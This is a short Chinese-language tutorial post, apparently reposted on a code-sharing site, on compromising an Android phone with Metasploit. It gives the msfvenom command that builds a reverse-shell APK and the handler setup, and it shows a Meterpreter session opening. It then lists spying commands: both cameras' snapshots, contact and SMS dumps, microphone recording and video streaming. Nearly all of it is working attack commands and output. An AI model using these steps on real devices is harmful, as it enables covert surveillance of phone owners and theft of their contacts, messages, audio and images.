MSF初體驗—入侵安卓手機


1.生成apk程序

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=5555 R > apk.apk

2.啟動msfconsole

3.啟動use exploit/multi/handler模塊

4.set payload android/meterpreter/reverse_tcp

5.show options 

6.准備工作

msf exploit(handler) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(handler) > set LPORT 5555
LPORT => 5555
msf exploit(handler) > exploit(運行apk程序)

[*] Started reverse TCP handler on 192.168.1.101:5555
[*] Starting the payload handler...
[*] Sending stage (63194 bytes) to 192.168.1.105
[*] Meterpreter session 1 opened (192.168.1.101:5555 -> 192.168.1.105:57629) at 2017-06-27 22:25:09 +0800

7.查看手機信息sysinfo

8.查看攝像頭

meterpreter > webcam_list
1: Back Camera
2: Front Camera

9.啟動攝像頭拍照

webcam_snap -i 1

webcam_snap -i 2

 

 

 

 

dump_contacts    --》這個是導出電話

dump_sms                 --》這個是導出信息

record_mic     Record audio from the default microphone for X seconds

webcam_chat    Start a video chat

webcam_list    List webcams

webcam_snap    Take a snapshot from the specified webcam

webcam_stream  Play a video stream from the specified webcam

成功解決

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM